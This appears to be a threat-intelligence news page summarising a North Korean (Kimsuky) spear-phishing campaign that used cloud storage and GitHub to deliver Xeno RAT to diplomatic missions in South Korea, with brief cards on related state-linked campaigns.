Kimsuky diplomatic spear-phishing campaign using GitHub and cloud storage
Campaign
Summary
Hide ▲
Show ▼
A North Korean spear-phishing campaign targeted diplomatic missions in South Korea, using GitHub and cloud storage to deliver Xeno RAT and enable remote control of compromised systems. The operation ran from March to July 2025 and used at least 19 emails impersonating trusted diplomatic contacts. It matters because the chain combined official-looking lures, cloud-hosted payloads, and persistence tactics to support espionage.
Related Happenings
North Korean remote IT worker scam operation targeting American companies
Campaign
First: 16.04.2026 19:00
Last: 16.04.2026 19:00
Sources 1
About this happening:
A long-running **North Korean remote IT worker scam operation** used **stolen identities** and fake placements to embed operators inside **more than 100 American companies**. The...
North Korean remote IT worker scam operation targeting American companies
CampaignAbout this happening: A long-running **North Korean remote IT worker scam operation** used **stolen identities** and fake placements to embed operators inside **more than 100 American companies**. The...
Konni APT KakaoTalk spear-phishing campaign targeting Android users in South Korea
Campaign
First: 11.11.2025 13:40
Last: 11.11.2025 13:40
Sources 1
About this happening:
A **Konni APT** operation is using **spear-phishing** and **KakaoTalk** to compromise **Android users in South Korea**, enabling device compromise and malware spread. The multi-st...
Konni APT KakaoTalk spear-phishing campaign targeting Android users in South Korea
CampaignAbout this happening: A **Konni APT** operation is using **spear-phishing** and **KakaoTalk** to compromise **Android users in South Korea**, enabling device compromise and malware spread. The multi-st...
UNK_SmudgedSerpent overlaps with TA453 TA455 and TA450 campaign expands across multiple victims
Campaign
First: 05.11.2025 18:00
Last: 05.11.2025 18:00
Sources 1
About this happening:
**UNK_SmudgedSerpent** is a **previously unknown** campaign that targeted **academics** and **foreign policy experts** focused on **Iran** and related policy issues between **June...
UNK_SmudgedSerpent overlaps with TA453 TA455 and TA450 campaign expands across multiple victims
CampaignAbout this happening: **UNK_SmudgedSerpent** is a **previously unknown** campaign that targeted **academics** and **foreign policy experts** focused on **Iran** and related policy issues between **June...
TransparentTribe BOSS Linux phishing espionage campaign
Campaign
First: 23.10.2025 18:30
Last: 23.10.2025 18:30
Sources 1
About this happening:
A **TransparentTribe / APT36** espionage campaign targeting **Indian government Linux systems** has been uncovered, showing an updated phishing operation built around **dedicated...
TransparentTribe BOSS Linux phishing espionage campaign
CampaignAbout this happening: A **TransparentTribe / APT36** espionage campaign targeting **Indian government Linux systems** has been uncovered, showing an updated phishing operation built around **dedicated...
PhantomCaptcha spear-phishing campaign targeting Ukraine war relief organizations
Campaign
First: 22.10.2025 19:55
Last: 22.10.2025 19:55
Sources 1
About this happening:
**PhantomCaptcha** was a **single-day spear-phishing campaign** on **October 8, 2025** that targeted **Ukraine war relief groups** and **Ukrainian regional government administrati...
PhantomCaptcha spear-phishing campaign targeting Ukraine war relief organizations
CampaignAbout this happening: **PhantomCaptcha** was a **single-day spear-phishing campaign** on **October 8, 2025** that targeted **Ukraine war relief groups** and **Ukrainian regional government administrati...
Timeline
-
20.08.2025 12:18 1 articles · 9mo ago
Trellix discloses diplomatic spear-phishing campaign
Initial DisclosureTrellix disclosed a North Korean cyber espionage campaign targeting diplomatic missions in South Korea between March and July 2025, describing at least 19 spear-phishing emails that impersonated trusted diplomatic contacts and used password-protected ZIP files hosted on Dropbox, Google Drive, and Daum. The infection chain used a Windows shortcut (LNK) to launch PowerShell, reach GitHub for next-stage malware, establish persistence through scheduled tasks, and deliver Xeno RAT and MoonPeak, while Trellix also assessed that the operators may be operating from China or have Chinese alignment based on timing and timezone analysis.
Show sources
- North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms — thehackernews.com — 20.08.2025 12:18